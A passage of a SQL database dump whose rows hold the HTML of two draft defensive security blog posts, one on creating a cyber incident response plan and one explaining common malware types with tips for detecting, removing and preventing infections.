and reset any credentials the attacker may have obtained; cleanup overwrites the evidence you need.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Perform detailed forensics on the captured evidence to understand the scope of the attack, including which other systems and accounts were touched.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Post-Incident Activities and Analysis</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">After addressing the immediate threat, conduct a post-mortem analysis:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Document the timeline of the incident and actions taken.</li>\r\n 	<li class=\"text-body font-regular 
leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Identify areas of improvement in your protocols.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Update your CIRP based on lessons learned.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Cybersecurity Trends and the Future of Incident Response</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">As cyber threats evolve, so must your CIRP. Here are some emerging trends shaping the future of incident response:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">AI and Automation</strong></b> are increasingly being used for threat detection and response, enabling faster reactions to incidents.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Cloud Security</strong></b> has become critical with organizations transitioning to remote work.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Proactive Threat Hunting</strong></b> through cybersecurity tools helps identify vulnerabilities before attackers can exploit them.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" 
value=\"4\"><b><strong class=\"font-bold\">Zero Trust Architecture</strong></b> ensures that no user or device is trusted by default, adding an extra layer of security.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Staying on top of these trends is key to adapting your CIRP to future challenges.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. How Small Businesses Can Develop and Implement a CIRP</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Small businesses, often resource-constrained, can still build effective CIRPs by leveraging these strategies:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Simplify</strong></b>: Focus on common threats faced by small businesses, such as phishing and ransomware.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Leverage Technology</strong></b>: Use cost-effective tools for endpoint protection, threat detection, and communication.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Outsource Expertise</strong></b>: Consider partnering with managed security service providers (MSSPs) to develop and enforce your CIRP.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong 
class=\"font-bold\">Train Employees</strong></b>: Educate your staff on cybersecurity hygiene and their roles during incidents.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Case Studies: CIRPs in Action</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Case Study 1: Retail Data Breach</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A retail business faced a major data breach, compromising customer credit card information. Thanks to a pre-defined CIRP:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">They quickly shut down affected systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Notified customers and provided resources for credit monitoring.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Updated their systems to prevent future breaches.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Case Study 2: Ransomware Attack</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A small law firm experienced a ransomware attack. 
Their CIRP allowed them to:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Isolate the affected systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Restore data from secured (offline or immutable) backups, after confirming the backups themselves had not been encrypted or tampered with and the attacker’s access had been removed.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Work with law enforcement to address the threat.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Both cases highlight the importance of preparedness and having a CIRP in place before incidents occur.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. 
Steps to Create Your Own CIRP</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To create your tailored CIRP, follow these steps:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Perform a Risk Assessment</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Identify critical assets that need protection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Determine common threats and vulnerabilities.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Create an Incident Response Team (IRT)</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Assemble a cross-functional team with IT, legal, and communication experts.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Develop Detailed 
Procedures</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Outline actionable steps for identification, containment, recovery, and communication.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Set Metrics for Success</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Define KPIs (e.g., time to detect, contain, and recover) to evaluate your CIRP\'s effectiveness.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"5\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Conduct Training and Simulations</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Ensure all stakeholders understand their responsibilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Regularly run simulations to test your CIRP.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] 
list-decimal\" start=\"6\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\"><b><strong class=\"font-bold\">Review and Update Regularly</strong></b>:</li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Update your CIRP annually or after every significant incident.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. Conclusion and Next Steps</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Building a Cyber Incident Response Plan is crucial for safeguarding your business in this evolving digital threat landscape. Whether you’re a small business owner, IT professional, or cybersecurity enthusiast, a robust CIRP is your shield against potential crises.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Take the next step towards enhancing your cybersecurity measures today. Start by assessing your current security posture and drafting a basic CIRP to handle future incidents. Remember—the best time to prepare for a cyber attack was yesterday. The second best time is today.</p>', '', NULL, NULL, 1, 'draft', '2025-01-19 15:08:54', '2026-01-12 21:41:44', 'Information Security', 'How to Create a Cyber Incident Response Plan', '', NULL),
(70, 'A Comprehensive Guide to Computer Viruses and How to Stay Safe', 'a-comprehensive-guide-to-computer-viruses-and-how-to-stay-safe', '[fusion_builder_container type=\"flex\" hundred_percent=\"no\" equal_height_columns=\"no\" hide_on_mobile=\"small-visibility,medium-visibility,large-visibility\" background_position=\"center center\" background_repeat=\"no-repeat\" fade=\"no\" background_parallax=\"none\" parallax_speed=\"0.3\" video_aspect_ratio=\"16:9\" video_loop=\"yes\" video_mute=\"yes\" border_style=\"solid\"][fusion_builder_row][fusion_builder_column type=\"1_1\" type=\"1_1\" background_position=\"left top\" border_style=\"solid\" border_position=\"all\" spacing=\"yes\" background_repeat=\"no-repeat\" margin_top=\"0px\" margin_bottom=\"0px\" animation_speed=\"0.3\" animation_direction=\"left\" hide_on_mobile=\"small-visibility,medium-visibility,large-visibility\" center_content=\"no\" last=\"no\" hover_type=\"none\" min_height=\"\" link=\"\"][fusion_text]<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Computer viruses</strong></b> are an ever-present threat in our digital lives. Just like biological viruses, they spread fast, cause harm, and often remain unnoticed until it\'s too late. With the rise of technology in daily life, understanding viruses, malware types, and protection strategies is critical. This guide will explain <b><strong class=\"font-bold\">what malware is</strong></b>, break down various types of threats, and share practical tips for <b><strong class=\"font-bold\">protecting your devices and data</strong></b>.</p>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is Malware?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Malware is short for “malicious software,” and it’s designed to harm, exploit, or disrupt your system. 
From stealing data to damaging files or taking control of your computer, malware can wreak havoc in various ways.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Malware Works</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once a virus has infected a device, it replicates itself by attaching to other files or programs, much as a biological virus does, and can corrupt other parts of your computer. Worm-type malware goes further and spreads to other machines on its own by exploiting unpatched vulnerabilities; most other malware instead relies on tricking the user into running it.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-Life Example</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The infamous “I Love You” worm spread via email with an attachment posing as a love letter—a script file given a double extension so that it looked like a plain text file. When opened, it ran a harmful script that overwrote files and forwarded itself to everyone in the user’s contact list, causing widespread chaos.</p>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Types of Computer Viruses and Malware</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding the different types of malware is key to staying safe. Here are <b><strong class=\"font-bold\">eight common types</strong></b> of computer threats:</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Trojan Horses</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These programs (not true viruses, since they do not self-replicate) disguise themselves as legitimate software, tricking users into installing them. Once active, they run harmful operations, often stealing sensitive data. 
A notable example is the Zeus Trojan, which targeted banking information globally.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Backdoors</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A backdoor is a hidden way into a system that bypasses normal authentication. Whether left behind by developers (for example, undocumented maintenance or debug access) or planted by other malware, it gives attackers persistent access and can lead to severe security breaches.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Worms</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unlike most other malware, worms can spread without user interaction, moving from machine to machine by exploiting network-reachable vulnerabilities. MyDoom, a famous worm (which mainly spread as an email attachment), built a botnet used for cyberattacks like distributed denial-of-service (DDoS).</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Spyware</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This type of malware operates silently, collecting your private information—like passwords or financial details—without your knowledge. For example, keyloggers record and transmit everything you type.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Ransomware</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ransomware encrypts your files and demands payment to unlock them. Both individuals and companies are common targets. 
Paying the ransom doesn’t guarantee data recovery, and many ransomware groups now also steal data before encrypting it, so even a clean restore from backup does not undo the exposure—making prevention critical.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. RAM Scrapers</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">RAM scrapers extract sensitive information from your computer’s memory, where data that is encrypted on disk and in transit is often held in the clear while it is being processed. For instance, malware like BlackPOS targeted retail point-of-sale systems, stealing customers\' credit card data.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Adware and Browser Hijackers</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Adware forces intrusive ads on you, while browser hijackers modify your settings—like changing your homepage or installing unwanted extensions—often redirecting you to malicious websites.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. File-Wiping Viruses</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These are designed purely to destroy. 
Unlike ransomware, which seeks financial gain, file-wiping viruses erase data and damage systems beyond repair.</p>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Detect and Remove Computer Viruses</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you suspect your computer has been infected, follow these steps to identify and eliminate threats:</p>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Run a Virus Scan</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Use trusted antivirus or antimalware software to detect malicious files. Ensure your software is up to date.</p>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Monitor for Unusual Behavior</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Slower system performance, unexpected pop-ups, or strange restarts could signal an infection.</p>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Disconnect from Networks</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cut off internet and local network access immediately (unplug the network cable or disable Wi-Fi) to prevent the virus from spreading or stealing data; if you may need evidence later, isolate the machine rather than powering it off.</p>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Remove the Virus</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Follow the instructions provided by your antivirus software to quarantine and permanently delete the malware. If the infection involved a rootkit, ransomware, or credential theft, treat the machine as untrusted: reinstall from a known-good image rather than relying on cleanup alone, and change any passwords that were used on it.</p>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Preventing Future Attacks</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Prevention is always better than cure, especially in the case of cyber threats. Here are <b><strong class=\"font-bold\">five critical steps</strong></b> to keep your systems secure:</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Avoid Suspicious Links</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Don’t click on unknown links or email attachments from untrusted senders.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Keep Software Updated</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Regularly update operating systems, browsers, and software to patch vulnerabilities that cybercriminals exploit.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. 
Use Firewalls</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Enable hardware and software firewalls to block unauthorized access to your network.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Stay Wary of Pop-Ups</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Avoid interacting with suspicious pop-ups and ads—they’re often gateways to malware sites.</p>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Always stay up-to date</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Learn about common cyberattack tactics, such as phishing, to identify threats before they impact you.<br><br></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Cybersecurity</strong></b> is a shared responsibility. By understanding <b><strong class=\"font-bold\">different types of malware</strong></b>, the way they function, and how to protect yourself from them, you’re taking proactive steps to safeguard your devices and data. Whether you\'re dealing with <b><strong class=\"font-bold\">ransomware</strong></b>, <b><strong class=\"font-bold\">spyware</strong></b>, or <b><strong class=\"font-bold\">worms</strong></b>, using modern antivirus solutions can help.</p>[/fusion_text][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]', '', NULL, NULL, 1, 'draft', '2025-01-18 19:26:30', '2026-01-12 21:41:44', 'Information Security', 'A Comprehensive Guide to Computer Viruses and How to Stay Safe', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
